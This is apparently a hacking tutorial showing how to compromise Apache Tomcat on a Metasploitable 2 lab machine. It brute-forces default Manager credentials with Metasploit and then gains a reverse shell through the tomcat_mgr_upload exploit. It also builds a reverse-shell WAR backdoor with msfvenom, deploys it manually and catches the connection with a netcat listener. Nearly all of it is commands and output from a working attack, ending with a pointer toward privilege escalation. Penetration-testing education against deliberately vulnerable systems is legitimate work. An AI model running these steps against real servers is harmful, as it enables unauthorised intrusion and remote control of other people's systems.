How to Hack Apache Tomcat via Malicious WAR File Upload

Jan 7, 2020 09:40 PM
637003333165922416.jpg

Web applications are a prime target for hackers, but sometimes it's not just the web apps themselves that are vulnerable. Web management interfaces should be scrutinized just as hard as the apps they manage, especially when they contain some sort of upload functionality. By exploiting a vulnerability in Apache Tomcat, a hacker can upload a backdoor and get a shell.

Apache Tomcat is an open-source implementation of several Java technologies, including Java Servlet, JSP, Java EL, and WebSocket. What this does is provide an environment where Java code can run over HTTP. It was first released in 1998 and is still developed and maintained today under the Apache License 2.0.

Tomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc. Previous versions of Apache Tomcat included a vulnerability that allowed attackers to upload and deploy a WAR backdoor.

We will be using Kali Linux to attack an instance of Metasploitable 2, an intentionally vulnerable virtual machine, to highlight the Tomcat vulnerability.

Target Enumeration

We can begin by performing an Nmap scan on the target to verify that Apache Tomcat is running. The -sV switch will attempt to determine the name and version of any available service:

~# nmap -sV 10.10.0.50

Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-06 11:33 CDT
Nmap scan report for 10.10.0.50
Host is up (0.0032s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 2.3.4
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet?
25/tcp   open  smtp?
53/tcp   open  domain?
80/tcp   open  tcpwrapped
111/tcp  open  rpcbind?
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  rmiregistry?
1524/tcp open  bindshell     Metasploitable root shell
2049/tcp open  nfs?
2121/tcp open  ccproxy-ftp?
3306/tcp open  mysql?
5432/tcp open  postgresql?
5900/tcp open  vnc           VNC (protocol 3.3)
6000/tcp open  X11?
6667/tcp open  irc           UnrealIRCd
8009/tcp open  ajp13?
8180/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:1D:09:55:B1:3B (Dell)
Service Info: Host: irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We can see that Tomcat is indeed running on HTTP port 8180.

Next, for this exploit to work reliably, we need a valid set of credentials. Metasploit has an auxiliary scanner that will attempt to brute-force Tomcat's Manager application. We can launch Metasploit by typing msfconsole in the terminal.

~# msfconsole

[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Use the search command to find any modules dealing with Apache Tomcat:

msf5 > search tomcat

Matching Modules
================

   #   Name                                                         Disclosure Date  Rank       Check  Description
   -   ----                                                         ---------------  ----       -----  -----------
   0   auxiliary/admin/http/tomcat_administration                                    normal     Yes    Tomcat Administration Tool Default Access
   1   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     Yes    Tomcat UTF-8 Directory Traversal Vulnerability
   2   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     Yes    TrendMicro Data Loss Prevention 5.5 Directory Traversal
   3   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   4   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   5   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     No     Hashtable Collisions
   6   auxiliary/scanner/http/tomcat_enum                                            normal     Yes    Apache Tomcat User Enumeration
   7   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Yes    Tomcat Application Manager Login Utility
   8   exploit/linux/http/cisco_prime_inf_rce                       2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   9   exploit/linux/http/cpi_tararchive_upload                     2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   10  exploit/multi/http/struts2_namespace_ognl                    2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   11  exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   12  exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   13  exploit/multi/http/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   14  exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   15  exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   16  exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   17  exploit/windows/http/tomcat_cgi_cmdlineargs                  2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   18  post/multi/gather/tomcat_gather                                               normal     No     Gather Tomcat Credentials
   19  post/windows/gather/enum_tomcat                                               normal     No     Windows Gather Apache Tomcat Enumeration

We will be using the tomcat_mgr_login module, so load it up with the use command:

msf5 > use auxiliary/scanner/http/tomcat_mgr_login

Now we can take a look at the options to see the available settings:

msf5 auxiliary(scanner/http/tomcat_mgr_login) > options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

First, set the remote hosts option to the IP address of our target:

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

And since Tomcat is running on port 8180, set the remote port as well:

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180

rport => 8180

That should be all we have to do to run this scanner. Type run to kick it off:

msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 10.10.0.50:8180 - Login Successful: tomcat:tomcat
[-] 10.10.0.50:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can see it attempt to log in using various combinations of default usernames and passwords. It looks like one login was successful with the username and password both being tomcat.

Get a Shell with Metasploit

Now that we have a valid set of credentials, we can exploit the vulnerability in Tomcat's Manager application. Back in our search results, locate the tomcat_mgr_upload exploit module, and load it with the use command:

msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload

Then, we can take a look at the current settings:

msf5 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target address range or CIDR identifier
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

We will want to set the remote hosts option:

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

And the correct remote port:

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8180

rport => 8180

We can also set the username at this point:

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat

HttpUsername => tomcat

And the password:

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat

HttpPassword => tomcat

We'll want to use an appropriate payload as well. To view the available payloads, use the show command:

msf5 exploit(multi/http/tomcat_mgr_upload) > show payloads

Compatible Payloads
===================

   #   Name                             Disclosure Date  Rank    Check  Description
   -   ----                             ---------------  ----    -----  -----------
   0   generic/custom                                    normal  No     Custom Payload
   1   generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   13  multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)

The java/shell_reverse_tcp payload will work in this case. Use the set command to set it as the current payload:

msf5 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp

payload => java/shell_reverse_tcp

Since we are using a reverse shell, we need to specify our local machine's IP address:

msf5 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.0.1

lhost => 10.10.0.1

And a local port of our choosing:

msf5 exploit(multi/http/tomcat_mgr_upload) > set lport 4321

lport => 4321

We should be good to go at this point. Simply type run to launch the exploit:

msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.0.1:4321
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying LUMzvVZI0wSUrt...
[*] Executing LUMzvVZI0wSUrt...
[*] Command shell session 1 opened (10.10.0.1:4321 -> 10.10.0.50:44738) at 2020-01-06 11:59:06 -0500
[*] Undeploying LUMzvVZI0wSUrt ...

We can see that a session was successfully opened. We now have a basic command shell and can run commands like id and uname -a to verify we have compromised the target:

~# id

uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

~# uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

WAR File Backdoor

Using Metasploit is easy, but it's not the only way to perform this exploit. We can upload a malicious WAR file manually to get a better idea of what's going on under the hood. To begin, we can use msfvenom to create our backdoor WAR file:

~# msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war

Payload size: 13395 bytes
Final size of war file: 13395 bytes
Saved as: pwn.war

In the above command, the -p flag specifies the payload, lhost is the IP address of our local machine, lport is the listening port on our machine, the -f flag specifies the desired format, and the -o flag is the name of the output file.

Next, we need to log into Apache Tomcat. In the browser, go to the IP address of the target on port 8180, and we should see the Apache Tomcat welcome page:

637003338793891792.jpg

Next, click on the "Tomcat Manager" link, and we should be presented with an authentication form where we can log in using the default credentials we found earlier:

637003339027016496.jpg

Scroll down to the "Deploy" section, and browse to the WAR file we just created with msfvenom:

637003339279204070.jpg

Click the "Deploy" button, and we should be brought back to the top of the page. Now, all we have to do is click on the file we just deployed and our payload will run.

But first, we need to set up a listener on our local machine. Netcat is always a good choice — just make sure to use the same port we specified earlier with msfvenom:

~# nc -lvnp 4321

listening on [any] 4321 ...

Finally, back in the Manager application, locate the name of the file we deployed and click on it:

637003339656547847.jpg

If everything worked properly, we should see a connection open on our Netcat listener:

connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 43521

And again, we can issue commands like id and uname -a to verify we have pwned the target, and we now have a shell as the tomcat55 user.

~# id

uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

~# uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

At this point, the next step would probably be attempting to escalate privileges to fully compromise the system — and remember to upgrade this dumb shell to make things easier.

Wrapping Up

In this tutorial, we learned a bit about Apache Tomcat and a vulnerability that allowed us to upload a malicious WAR file and get a shell. First, we enumerated the target with Nmap and found some valid credentials using a scanner. Then, we were able to exploit the vulnerability with both Metasploit and by manually uploading a WAR file backdoor. Often, when hacking or pentesting, the way to a shell is by abusing some functionality to do something unintended.

Cover image by frabre/Pixabay; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!